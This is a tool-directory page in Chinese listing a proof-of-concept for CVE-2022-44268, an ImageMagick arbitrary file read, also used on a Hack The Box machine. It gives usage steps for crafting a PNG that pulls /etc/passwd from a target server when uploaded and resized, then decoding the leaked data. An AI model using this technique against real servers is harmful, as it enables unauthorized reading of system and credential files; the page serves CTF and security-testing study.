Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ImageMagick-lfi-poc — ImageMagick 任意文件读取 - CVE-2022-44268 | Kitploit
工具/GitHubGitHub/fanbyprinciple/imagemagick-lfi-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集CTF渗透测试
GitHubfanbyprinciple/imagemagick-lfi-poc

ImageMagick-lfi-poc

ImageMagick 任意文件读取 - CVE-2022-44268

查看仓库
113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ImageMagick-lfi-poc

ImageMagick 任意文件读取 - CVE-2022-44268

也用于 HTB Pilgrimage

ImageMagick LFI PoC [CVE-2022-44268]

MetabaseQ 的研究人员发现了 CVE-2022-44268,即 ImageMagick 7.1.0-49 存在信息泄露漏洞。当它解析 PNG 图像(例如用于调整大小)时,生成的图像可能嵌入任意远程文件的内容(如果 ImageMagick 二进制文件具有读取该文件的权限)。

步骤 1:

运行

root@kitploit:~
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat

步骤 2:

运行

root@kitploit:~
python3 magick_exploit.py generate -l [local_file] -o [output_file]

此处的本地文件是 /etc/passwd,我想从目标机器获取该文件。

步骤 3:

将图像文件上传到网站

步骤 4:

从网站获取转换后的图像文件。 将其命名为 downloaded_image.png

步骤 5:

运行

root@kitploit:~
python3 decode_profile.py

注意

如果出现如下错误:

root@kitploit:~
 "/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
    profile = output_str.split("Raw profile type: \n\n    ")[1].split('Date:create:')[0]
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range

这意味着你提到的文件不存在。请使用 /etc/passwd 进行验证。

致谢

  1. https://github.com/adhikara13/CVE-2022-44268-MagiLeak
  2. https://github.com/Sybil-Scan/imagemagick-lfi-poc
下载工具